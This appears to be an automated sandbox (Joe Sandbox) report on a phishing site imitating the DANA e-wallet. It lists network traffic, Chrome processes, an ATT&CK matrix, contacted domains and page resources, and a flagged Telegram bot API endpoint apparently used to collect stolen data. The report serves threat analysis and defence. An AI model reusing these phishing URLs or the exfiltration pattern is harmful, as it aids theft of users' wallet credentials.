Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50063
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
Source: unknownNetwork traffic detected: HTTP traffic on port 50068 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
Source: unknownNetwork traffic detected: HTTP traffic on port 50091 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50056 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50076
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50078
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50077
Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50081
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50083
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50082
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50085
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50084
Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50087
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50086
Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50089
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50088
Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50090
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50091
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50094
Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50093
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50096
Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50095
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
Source: unknownNetwork traffic detected: HTTP traffic on port 50090 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
Source: unknownNetwork traffic detected: HTTP traffic on port 50078 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.6:49744 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49754 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49786 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49803 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49863 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:50026 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:50102 version: TLS 1.2
Source: classification engineClassification label: sus22.phis.win@18/99@26/13
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2320 --field-trial-handle=2224,i,8753130838461143343,2683393986688760850,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://penukran-poin-dana.aktsx.cfd/"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2320 --field-trial-handle=2224,i,8753130838461143343,2683393986688760850,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
Process Injection
1
Process Injection
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
Extra Window Memory Injection
1
Extra Window Memory Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
fe4.edge.pantheon.io
23.185.0.4
truefalse
    unknown
    bg.microsoft.map.fastly.net
    199.232.210.172
    truefalse
      unknown
      penukran-poin-dana.aktsx.cfd
      165.22.241.119
      truefalse
        unknown
        code.jquery.com
        151.101.194.137
        truefalse
          unknown
          www.google.com
          142.250.184.196
          truefalse
            unknown
            www.dana.id.w.cdngslb.com
            163.181.92.228
            truefalse
              unknown
              unpkg.com
              104.17.249.203
              truefalse
                unknown
                default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
                217.20.57.18
                truefalse
                  unknown
                  googlehosted.l.googleusercontent.com
                  172.217.18.1
                  truefalse
                    unknown
                    fp2e7a.wpc.phicdn.net
                    192.229.221.95
                    truefalse
                      unknown
                      dev-danapemulihan.pantheonsite.io
                      unknown
                      unknownfalse
                        unknown
                        www.dana.id
                        unknown
                        unknownfalse
                          unknown
                          blogger.googleusercontent.com
                          unknown
                          unknownfalse
                            unknown
                            NameMaliciousAntivirus DetectionReputation
                            https://dev-danapemulihan.pantheonsite.io/asset/pin.cssfalse
                              unknown
                              https://unpkg.com/ionicons@7.1.0/dist/ionicons/ionicons.esm.jsfalse
                                unknown
                                http://penukran-poin-dana.aktsx.cfd/#carousel__slide1false
                                  unknown
                                  http://penukran-poin-dana.aktsx.cfd/asset/img/load_bg.pngfalse
                                    unknown
                                    http://penukran-poin-dana.aktsx.cfd/#carousel__slide3false
                                      unknown
                                      https://unpkg.com/ionicons@7.1.0/dist/ionicons/p-40ae2aa7.jsfalse
                                        unknown
                                        https://dev-danapemulihan.pantheonsite.io/asset/jquery.mask.min.jsfalse
                                          unknown
                                          http://penukran-poin-dana.aktsx.cfd/asset/img/hero.svgfalse
                                            unknown
                                            https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilUMIG_IMFVixTFpWb4xA5f1HJt25lbv-cc1baknB_YJeWO9FYU4SJOzdeMNkA1msFpUU-0MiI3B-llmFX122-XhqCq7-1HW4YUfaWX52rlNtfspDDvlFNj_A--xZIRknP3ycDkzm51noxYaFx_gfOck3U745QZSBwpCSesqOq1oEycuQamqaZlqoz/s16000/ezgif.com-crop%20(3).giffalse
                                              unknown
                                              https://dev-danapemulihan.pantheonsite.io/asset/google.jstrue
                                                unknown
                                                https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixR-U2gHP_VriGKaaVcf-_BbZmvWWoaRI8Wd26DYewNJayil_To6kgdWxmdq3TDJKQJ7lAAbD1de1uuuWTLQzCGdR8qT1S2mTehsdR02AFN573iPkN-0IrliCuRAy0xJfSH9AlfJWV7odqpRC_bxJLM2EkLf-84_ePEjEfE8SOtiKfEjcLQ7nDBjDc/s16000/ezgif.com-crop%20(4).giffalse
                                                  unknown
                                                  https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEid9dARAQbMu1UTEgpOfyH6pn4eI3_XArbELp_8lfZtysRgex-gqs0Czc9ch_O7U2lrucgBVSqGQEL33BwV3Ri4D3evjzJHJ6LBFa_K-pIPbdO6QQ3iHlTkLiqo_w2z2NbXTw83lNcWHG7T9q2n6m7N3SZ-qfZpTdsioS3dm-YIfJh4zU16QEODOLKn/s16000/AddText_06-06-08.17.04.jpgfalse
                                                    unknown
                                                    https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbD-mmuMUDwaeFMEz6NefivuQqHyrFXvXxqVxMhYRhR5wsfUhiWkPNkpxLKkagRNpJ2obIiZH_D9EK6tnHIJUFMVBOclZI98zrU7VPszAR5n-_GeSWNCNgnfH1MRWuL-ahhPjxsejyDa5yyWAaOMWXWT4jS4EngtdLLlXjaPakQoFIOsjyS6tfnEBHDlw/s16000/output-onlinegiftools.giffalse
                                                      unknown
                                                      https://www.dana.id/favicon.icofalse
                                                        unknown
                                                        https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjj8Fs3JMUwF85O07XgsV-e1rmQjTwS91jcu-zh3Lr_fEgVfhY823rmnMewtU59iGvsFjcBm-12OLSj81f57ZEksJeU2GaG7UU3zuwDsOsfTO4dAJ693JJyILcXjdHEzirw-pPBCeV1CfTqSroNgoMTGIfy-Y-HC8GAJDmo68GYd1-x2gGu0UsincrU/s16000/ezgif.com-crop%20(5).giffalse
                                                          unknown
                                                          https://dev-danapemulihan.pantheonsite.io/asset/container.cssfalse
                                                            unknown
                                                            http://penukran-poin-dana.aktsx.cfd/asset/img/kom.pngfalse
                                                              unknown
                                                              https://dev-danapemulihan.pantheonsite.io/asset/img/load_spin.pngfalse
                                                                unknown
                                                                http://penukran-poin-dana.aktsx.cfd/asset/img/load_spin.pngfalse
                                                                  unknown
                                                                  https://unpkg.com/ionicons@7.1.0/dist/ionicons/p-1c0b2c47.entry.jsfalse
                                                                    unknown
                                                                    http://penukran-poin-dana.aktsx.cfd/asset/img/dana_text.pngfalse
                                                                      unknown
                                                                      https://dev-danapemulihan.pantheonsite.io/asset/otp.cssfalse
                                                                        unknown
                                                                        https://dev-danapemulihan.pantheonsite.io/asset/img/load_bg.pngfalse
                                                                          unknown
                                                                          https://code.jquery.com/jquery-3.5.1.min.jsfalse
                                                                            unknown
                                                                            https://dev-danapemulihan.pantheonsite.io/asset/main.cssfalse
                                                                              unknown
                                                                              https://dev-danapemulihan.pantheonsite.io/asset/img/dana_logo.pngfalse
                                                                                unknown
                                                                                http://penukran-poin-dana.aktsx.cfd/false
                                                                                  unknown
                                                                                  https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhl9xJVYWF_a9vAhgW5QQgozvZVADTaJgIX64iO7a5sQuMpSoPBK3zfKjvT6xc9fZPfxZz39mjk1H_oZOOOtYvO1l7DkWNqiD5LJyGYdwDNyHuyqLk_Ix6eFs3aLCG2yUXVwtsnj0BXTA40WZmecyLyCIm_ff0xNkkOvkuKBOl6yfS-QjI_EJrIyGtU/s1600/load_spin.pngfalse
                                                                                    unknown
                                                                                    https://unpkg.com/ionicons@7.1.0/dist/ionicons/p-d15ec307.jsfalse
                                                                                      unknown
                                                                                      https://unpkg.com/ionicons@7.1.0/dist/ionicons/svg/chevron-back-outline.svgfalse
                                                                                        unknown
                                                                                        https://dev-danapemulihan.pantheonsite.io/asset/img/indo.pngfalse
                                                                                          unknown
                                                                                          http://penukran-poin-dana.aktsx.cfd/asset/img/bi.pngfalse
                                                                                            unknown
                                                                                            https://dev-danapemulihan.pantheonsite.io/asset/loader.cssfalse
                                                                                              unknown
                                                                                              http://penukran-poin-dana.aktsx.cfd/asset/img/dana_logo.pngfalse
                                                                                                unknown
                                                                                                NameSourceMaliciousAntivirus DetectionReputation
                                                                                                https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilUMIG_IMFVixTFpWb4xA5f1HJt25lbv-cc1baknBchromecache_85.2.drfalse
                                                                                                  unknown
                                                                                                  https://www.dana.idchromecache_85.2.drfalse
                                                                                                    unknown
                                                                                                    https://a.bsite.net/footer.jschromecache_85.2.drfalse
                                                                                                      unknown
                                                                                                      https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixR-U2gHP_VriGKaaVcf-_BbZmvWWoaRI8Wd26DYechromecache_85.2.drfalse
                                                                                                        unknown
                                                                                                        https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWg2Gu-OJgBB04_6jT0WUgRXWLn5YbRSrznAuun2Uchromecache_85.2.drfalse
                                                                                                          unknown
                                                                                                          https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjj8Fs3JMUwF85O07XgsV-e1rmQjTwS91jcu-zh3Lrchromecache_85.2.drfalse
                                                                                                            unknown
                                                                                                            https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhl9xJVYWF_a9vAhgW5QQgozvZVADTaJgIX64iO7a5chromecache_85.2.drfalse
                                                                                                              unknown
                                                                                                              https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbD-mmuMUDwaeFMEz6NefivuQqHyrFXvXxqVxMhYRchromecache_85.2.drfalse
                                                                                                                unknown
                                                                                                                https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiftOkTXOPr5az8LHt3m-DZNiM0T98GalJ0P3bBLQKchromecache_85.2.drfalse
                                                                                                                  unknown
                                                                                                                  https://api.telegram.org/bot$chromecache_84.2.dr, chromecache_115.2.drtrue
                                                                                                                    unknown
                                                                                                                    https://www.dana.id/chromecache_85.2.drfalse
                                                                                                                      unknown
                                                                                                                      https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEid9dARAQbMu1UTEgpOfyH6pn4eI3_XArbELp_8lfZchromecache_85.2.drfalse
                                                                                                                        unknown
                                                                                                                        https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8hbZEfutKvr9pkj0-mkJYWt-1SBtt3gw-HFOEZc0chromecache_85.2.drfalse
                                                                                                                          unknown
                                                                                                                          https://unpkg.com/ioniconschromecache_85.2.drfalse
                                                                                                                            unknown
                                                                                                                            • No. of IPs < 25%
                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                            • 75% < No. of IPs
                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                            142.250.184.196
                                                                                                                            www.google.comUnited States
                                                                                                                            15169GOOGLEUSfalse
                                                                                                                            163.181.92.228
                                                                                                                            www.dana.id.w.cdngslb.comUnited States
                                                                                                                            24429TAOBAOZhejiangTaobaoNetworkCoLtdCNfalse
                                                                                                                            172.217.18.1
                                                                                                                            googlehosted.l.googleusercontent.comUnited States
                                                                                                                            15169GOOGLEUSfalse
                                                                                                                            151.101.130.137
                                                                                                                            unknownUnited States
                                                                                                                            54113FASTLYUSfalse
                                                                                                                            142.250.185.193
                                                                                                                            unknownUnited States
                                                                                                                            15169GOOGLEUSfalse
                                                                                                                            239.255.255.250
                                                                                                                            unknownReserved
                                                                                                                            unknownunknownfalse
                                                                                                                            104.17.247.203
                                                                                                                            unknownUnited States
                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                            165.22.241.119
                                                                                                                            penukran-poin-dana.aktsx.cfdUnited States
                                                                                                                            14061DIGITALOCEAN-ASNUSfalse
                                                                                                                            104.17.249.203
                                                                                                                            unpkg.comUnited States
                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                            23.185.0.4
                                                                                                                            fe4.edge.pantheon.ioUnited States
                                                                                                                            54113FASTLYUSfalse
                                                                                                                            151.101.194.137
                                                                                                                            code.jquery.comUnited States
                                                                                                                            54113FASTLYUSfalse
                                                                                                                            IP
                                                                                                                            192.168.2.7
                                                                                                                            192.168.2.6
                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                            Analysis ID:1526642
                                                                                                                            Start date and time:2024-10-06 13:49:08 +02:00
                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                            Overall analysis duration:0h 3m 45s
                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                            Report type:full
                                                                                                                            Cookbook file name:browseurl.jbs
                                                                                                                            Sample URL:http://penukran-poin-dana.aktsx.cfd/
                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                            Number of analysed new started processes analysed:8
                                                                                                                            Number of new started drivers analysed:0
                                                                                                                            Number of existing processes analysed:0
                                                                                                                            Number of existing drivers analysed:0
                                                                                                                            Number of injected processes analysed:0
                                                                                                                            Technologies:
                                                                                                                            • HCA enabled
                                                                                                                            • EGA enabled
                                                                                                                            • AMSI enabled
                                                                                                                            Analysis Mode:default
                                                                                                                            Analysis stop reason:Timeout
                                                                                                                            Detection:SUS
                                                                                                                            Classification:sus22.phis.win@18/99@26/13
                                                                                                                            EGA Information:Failed
                                                                                                                            HCA Information:
                                                                                                                            • Successful, ratio: 100%
                                                                                                                            • Number of executed functions: 0
                                                                                                                            • Number of non-executed functions: 0
                                                                                                                            Cookbook Comments:
                                                                                                                            • Browse: http://penukran-poin-dana.aktsx.cfd/#carousel__slide1
                                                                                                                            • Browse: http://penukran-poin-dana.aktsx.cfd/#carousel__slide3
                                                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                                            • Excluded IPs from analysis (whitelisted): 142.250.185.131, 142.250.184.238, 173.194.76.84, 34.104.35.123, 142.250.185.202, 142.250.186.106, 172.217.18.10, 142.250.185.74, 142.250.184.234, 216.58.206.74, 142.250.181.234, 142.250.74.202, 172.217.16.138, 142.250.186.74, 172.217.16.202, 142.250.186.138, 216.58.206.42, 142.250.184.202, 142.250.186.42, 142.250.186.170, 142.250.185.234, 142.250.185.106, 95.101.54.241, 2.16.202.16, 4.245.163.56, 192.229.221.95, 40.69.42.241, 93.184.221.240, 172.217.23.99
                                                                                                                            • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, clientservices.googleapis.com, wu.azureedge.net, clients2.google.com, ocsp.digicert.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, update.googleapis.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, client.wns.windows.com, www.dana.id.edgesuite.net, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, ajax.googleapis.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, ctldl.windowsupdate.com, a1502.r.akamai.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, edgedl.me.gvt1.com, translate.googleapis.com, clients.l.google.com
                                                                                                                            • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                            • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                            • VT rate limit hit for: http://penukran-poin-dana.aktsx.cfd/
                                                                                                                            No simulations
                                                                                                                            InputOutput
                                                                                                                            URL: http://penukran-poin-dana.aktsx.cfd/#carousel__slide1 Model: jbxai
                                                                                                                            {
                                                                                                                            "brand":["unknown"],
                                                                                                                            "contains_trigger_text":false,
                                                                                                                            "prominent_button_name":"unknown",
                                                                                                                            "text_input_field_labels":["unknown"],
                                                                                                                            "pdf_icon_visible":false,
                                                                                                                            "has_visible_captcha":false,
                                                                                                                            "has_urgent_text":false,
                                                                                                                            "has_visible_qrcode":false}
                                                                                                                            No context
                                                                                                                            No context
                                                                                                                            No context
                                                                                                                            No context
                                                                                                                            No context
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:PNG image data, 480 x 118, 8-bit/color RGBA, non-interlaced
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):10588
                                                                                                                            Entropy (8bit):7.920893955198491
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:192:M6+HXQMbqmgEy9n5LzCldeYK61VX+oqwckpZ7QSYQv/95F9aWfwNpkcRe/:M6gzb7g79nUHeYK6fJn7MSYU/9JPwNe5
                                                                                                                            MD5:3DC459976E4F7086419105435A80FC25
                                                                                                                            SHA1:4A79A70AE98BE7B6386DDDE8609D83EEE4777373
                                                                                                                            SHA-256:8AF7F1691E018BFC400432DFC61455F26F63226AB369E675C80CEF5A93334E87
                                                                                                                            SHA-512:E83D13B741E2C2E5AC38CB498485EB8C0E7D31E6D182DEB8A9AE54A3F306C301FC984AE6BC353142AC1FF7531B8C4A7E21D6711C23DD5F548EF38300208021C2
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            Preview:.PNG........IHDR.......v.......@.....sRGB.........sBIT....|.d... .IDATx..{x.W}...h...m.b;..!.Sn.!@. ?.f..u.>.ko.%.t..R..h...m...]Z.Xd...r.bq)-."..N.+..e.dY.......w..d.y.}5..<zlI.....=.....p8.....p8.....p8.....p8....orr2Gr.S.6...W.*~w.kW....dnll,K..d.d..GR...+.R..s....~..y.If...'O.l#....N.8........R.......W.f.Y.....099...#G.d..<...;...@2.....^..8q.D+.*y.........@,.,P/..f.....T.;..*7 r.}0...s"..U?;..._...T.?..oU..@....Y.y.......)...8..>?44T.gO.Fc....o.}..Z.l....j.[.l....L2+"-.R..$."R.Z/..WJ=.....yG....;..JUs..CHz....|[kk.f...v..+`.@.f...L.<.E.Y.....1...~.3......n....i..........5`..[)...*.*.@... O. ".0......R.(..8.`.@AD.:.....f.....wgV.qV..dYDN.....A.|........*...l.FH.......l..{...v.y........M..3+sD.(...pLk.e...N.>=.q..%..X[.'.....x}}}..................BP.u)..@..q.GE.~...p.@1.&pkD}......d.......0s....E$.s...>...k.3"r...........X......8v.X...s}... ..A...T*...L.Kv...1.. y...<Nr....Z..i...A.|.........z.F.B..d...w.|..8..9@R.<E.(.{K.....$W..s
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:ASCII text, with very long lines (3879), with no line terminators
                                                                                                                            Category:downloaded
                                                                                                                            Size (bytes):3879
                                                                                                                            Entropy (8bit):5.011372300991071
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:96:N6G4v4Vokbj8GS5cEkHRZuxCGHn1ziA7xMq4:NFokEwyctx
                                                                                                                            MD5:6A8C3D6F52EAA646F71E2E83CBD3F101
                                                                                                                            SHA1:500FC6CF07CB5B9E6225DA77CA5736FCF4E5B3B2
                                                                                                                            SHA-256:64FBE5E2A5068AC3483ECE2807F7EA9AB3BE2BA44DB45FFAD94D0260730DDB5F
